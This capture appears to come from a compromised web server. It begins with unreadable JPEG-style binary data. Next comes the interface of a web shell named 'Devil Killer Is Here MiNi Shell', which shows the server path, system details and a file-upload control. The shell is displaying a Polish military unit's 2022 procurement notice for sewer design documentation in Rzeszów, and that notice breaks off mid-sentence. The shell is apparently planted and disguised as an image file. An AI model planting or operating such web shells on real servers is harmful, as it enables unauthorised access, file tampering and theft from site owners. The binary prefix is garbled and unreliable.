JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220311/0008247301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej remontu zewnętrznej sieci kanalizacji ogólnospławnej wraz z przykanalikami w kompleksie wojskowym w Rzeszowie przy ul. Krakowska 11B </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">34 Wojskowy Oddział Gospodarczy w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180690373</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakowska 11B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia34wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.34wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej remontu zewnętrznej sieci kanalizacji ogólnospławnej wraz z przykanalikami w kompleksie wojskowym w Rzeszowie przy ul. Krakowska 11B </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ec22de29-a06d-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00082473</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00063264/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wykonanie dokumentacji projektowej na remont sieci kanalizacji sanitarnej i deszczowej- Rzeszów ul. Krakowska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/34wog/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 1. Wykonawca może odbyć wizję lokalną w celu zbadania przedmiotu zamówienia i jego otoczenia oraz uzyskania samemu<br/>i na własną odpowiedzialność wszelkich informacji, które mogą być konieczne do przygotowania oferty oraz zawarcia<br/>umowy. Zamawiający rekomenduje odbycie wizji lokalnej aczkolwiek udział w wizji lokalnej nie jest warunkiem koniecznym<br/>do złożenia oferty.<br/>2. Warunkiem odbycia wizji lokalnej z zakresem prac związanych z zaprojektowaniem sieci kanalizacyjnej jest<br/>przedstawienie przed jej rozpoczęciem: aktualnego poświadczenia bezpieczeństwa osobowego uprawniające do dostępu do<br/>informacji niejawnych o klauzuli co najmniej „ZASTRZEŻONE” lub pisemne upoważnienie uprawniające do dostępu do<br/>takich informacji, wydane przez kierownika jednostki organizacyjnej oraz aktualne zaświadczenie o odbyciu szkolenia w<br/>zakresie ochrony informacji niejawnych. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu<br/>środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej<br/>zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. Adres strony internetowej:<br/>www.platformazakupowa.pl/pn/34wog/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu o<br/>udzielenie zamówienia publicznego za wyjątkiem zasad dotyczących czynności złożenia oferty, które zostały określone w ust. 2<br/>poniżej, komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie dokumentów, oświadczeń, uzupełnień,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem formularza „Wyślij wiadomość”<br/>dostępnego na dole strony internetowej postępowania zamieszczonego<br/>na platformie: https://platformazakupowa.pl/pn/34wog/proceedings lub za pomocą poczty<br/>elektronicznej e-mail: zamowienia34wog@ron.mil.pl. 2. Ofertę wraz z załącznikami wymaganymi do<br/>oferty należy złożyć w oryginale w formie elektronicznej opatrzoną kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym –<br/>za pośrednictwem Formularza oferty dostępnego na:<br/>https://platformazakupowa.pl/pn/34wog/proceedings. 3.Zamawiający będzie przekazywał Wykonawcom informacje w formie<br/>elektronicznej za pośrednictwem Platformy lub za pomocą poczty<br/>elektronicznej e-mail: zamowienia34wog@ron.mil.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>Platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy lub za pomocą poczty elektronicznej e-mail<br/>konkretnemu Wykonawcy. 4.<br/>Limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku to 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB.5. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w<br/>sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer<br/>klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany program<br/>Adobe Acrobat Reader lub innyobsługujący format plików .pdf,f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą<br/>protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.6. W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie formatów: .zip i .7Z. 7. Podmiotowe środki dowodowe, wszelkie oświadczenia o<br/>których mowa w specyfikacji warunków zamówienia dotyczące Wykonawcy i Podwykonawców, składa się w oryginale w formie<br/>elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym, w formie pisemnej, w ogólniedostępnych formatach danych.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/34wog/proceedings</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W związku z wprowadzeniem do krajowego porządku prawnego postanowień<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej RODO, a także ustawy z dnia 10 maja 2018 r. o ochronie<br/>danych osobowych informuje się, iż na stronie internetowej Zamawiającego pod adresem:<br/>https://34wog.wp.mil.pl/pl/pages/klauzule-informacyjne-2019-07-31-q/ zawarto stosowną klauzulę informacyjną dla osób fizycznych<br/>przystępujących i biorących udział w postępowaniu o udzielenie zamówienia publicznego.<br/>2. Wykonawcy ubiegający się o udzielenie zamówienia powinni zapoznać się treścią przedmiotowej klauzuli jak również<br/>respektować zawarte w niej postanowienia i zasady.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/29/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowo-kosztorysowej remontu zewnętrznej sieci<br/>kanalizacji ogólnospławnej wraz z przykanalikami<br/>w kompleksie wojskowym w Rzeszowie przy ul. krakowska 11B<br/>2. Dokumentacja projektowa, o której mowa w ust. 1, powyżej, powinna zostać wykonana zgodnie z obowiązującymi<br/>przepisami prawa, w tym, w szczególności: zgodnie z ustawą z dnia 7 lipca 1994 r. prawo budowlane (t.j. Dz. U. z 2021 r.<br/>poz. 2351z późn. zm.), rozporządzeniem Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i<br/>formy projektu budowlanego (Dz. U. poz. 1609 z późn. zm.), . rozporządzenie Ministra Rozwoju i Technologii z dnia<br/>20.12.2021 r. w sprawie szczegółowego zakresu<br/>i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu<br/>funkcjonalno–użytkowego (Dz. U. poz. 2454), rozporządzeniem Ministra Rozwoju i Technologii z dnia 20.12.2021 r. w<br/>sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac<br/>projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. poz.<br/>2458).<br/>3. Dokumentacja projektowa, o której mowa w ust. 1, powyżej, powinna zostać opracowana zgodnie z szczegółowym<br/>opisem przedmiotu zamówienia, w formie opisowej i rysunkowej w wersji papierowej i elektronicznej. Powinna zawierać<br/>wszelkie wymagane prawem pozwolenia i decyzje administracyjne, uzgodnienia, konieczne do wykonania robót<br/>budowlanych na podstawie opracowanej dokumentacji projektowo – kosztorysowej.<br/>4. Dokumentacja projektowa, o której mowa w ust. 1 zostanie przekazana Zamawiającemu w następujących ilościach oraz<br/>formach:<br/>- projekty budowlane (z podziałem na część jawną i zastrzeżoną), w tym założenia do Planu BiOZ - po 5 egz.<br/>- projekt techniczny (jawny) - po 3 egz.<br/>- część kosztową tj. przedmiary robót i kosztorysy inwestorskie - po 3 egz.<br/>- specyfikacje techniczne wykonania odbioru robót budowlanych - po 3 egz.<br/>- płyty CD z zapisanymi elektronicznie ww. dokumentami - w 2 egz.<br/>5. Do opracowanej dokumentacji Wykonawca dołączy oświadczenie, iż dokumentacja projektowa jest wykonana zgodnie z<br/>zamówieniem, dokonanymi uzgodnieniami, obowiązującymi przepisami prawa, kompletna z punktu widzenia celu któremu<br/>ma służyć,<br/>a także oświadczenie, iż zaproponowane materiały i urządzenia opisywano z zachowaniem przepisów wynikających z art.<br/>99 – 103 Prawa zamówień publicznych.<br/>6. Wykonanie zamówienia wiązać się będzie z dostępem do informacji, które mają charakter niejawny (klauzula<br/>ZASTRZEŻONE). Osoby przewidziane do wykonania dokumentacji projektowej w zakresie sieci kanalizacyjnej muszą<br/>posiadać poświadczenie bezpieczeństwa osobowego uprawniające do dostępu do informacji niejawnych o klauzuli co<br/>najmniej „ZASTRZEŻONE” lub pisemne upoważnienie uprawniające do dostępu do takich informacji, wydane przez<br/>kierownika jednostki organizacyjnej oraz aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji<br/>niejawnych.<br/>7. Ponadto Wykonawca realizujący przedmiotowe zamówienie musi posiadać system teleinformatyczny umożliwiający<br/>przetwarzanie informacji niejawnych o klauzuli „ZASTRZEŻONE” spełniający wszystkie warunki wynikające z zapisów art. 48 ust. 9 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych.<br/>8. Zamawiający nie wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę żadnych<br/>osób wykonujących przedmiot zamówienia w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71248000-8 - Nadzór nad projektem i dokumentacją</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-09</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) Spełniają warunki udziału w postępowaniu określone poniżej przez Zamawiającego dotyczące zdolności technicznej lub<br/>zawodowej w zakresie posiadanego doświadczenia. Warunek w powyższym zakresie zostanie uznany za spełniony, jeżeli<br/>Wykonawcy ubiegający się o udzielenie przedmiotowego zamówienia wykażą, że :<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania Ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali w sposób należyty co najmniej 2 usługi odpowiadające przedmiotowi zamówienia, polegające na opracowaniu dokumentacji projektowo-kosztorysowej na wykonanie zewnętrznej sieci kanalizacyjnej o wartości co najmniej<br/>60.000,00 zł brutto każda (słownie: sześćdziesiąt tysięcy złotych brutto),<br/>UWAGA: <br/>Nie dopuszcza się sumowania wartości dokumentacji projektowych zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego.<br/>2) Spełniają warunki udziału w postępowaniu określone poniżej przez Zamawiającego dotyczące zdolności technicznej lub<br/>zawodowej w zakresie posiadanego potencjału osobowego skierowanego do realizacji zamówienia. Warunek w powyższym<br/>zakresie zostanie uznany za spełniony, jeżeli Wykonawcy ubiegający się o udzielenie przedmiotowego zamówienia wykażą,<br/>że dysponują lub będą dysponować i skierują do realizacji przedmiotowego zamówienia:<br/>a) co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia w charakterze projektanta (branża<br/>konstrukcyjno-budowlana), posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo<br/>budowlane oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne<br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów<br/>obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy<br/>organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej, lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy<br/>oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz<br/>urbanistów w zakresie projektowania w specjalności konstrukcyjno-budowlanej<br/>b) co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia w charakterze projektanta (branża sanitarna),<br/>posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane oraz w<br/>Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane<br/>wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z<br/>dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej, lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów w zakresie<br/>projektowania w specjalności instalacyjnej sieci, instalacji i urządzeń sanitarnych;<br/>c) co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia w charakterze projektanta (branża elektryczna),<br/>posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane oraz w<br/>Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane<br/>wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z<br/>dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej, lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów w zakresie<br/>projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,<br/>UWAGA:<br/>W zakresie osób wskazanych w ppkt a), b) oraz c) wymagana jest przynależność projektantów do właściwej Izby<br/>Samorządu Zawodowego (zgodnie z art. 15 ustawy Prawo Budowlane -tekst jednolity Dz.U. z 2016 r poz. 290 oraz<br/>rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w<br/>budownictwie-Dz.U. z 2014 r. poz. 1278).<br/>d) co najmniej 1 osobę, która będzie uczestniczyć w wykonaniu zamówienia w zakresie geodezyjnych 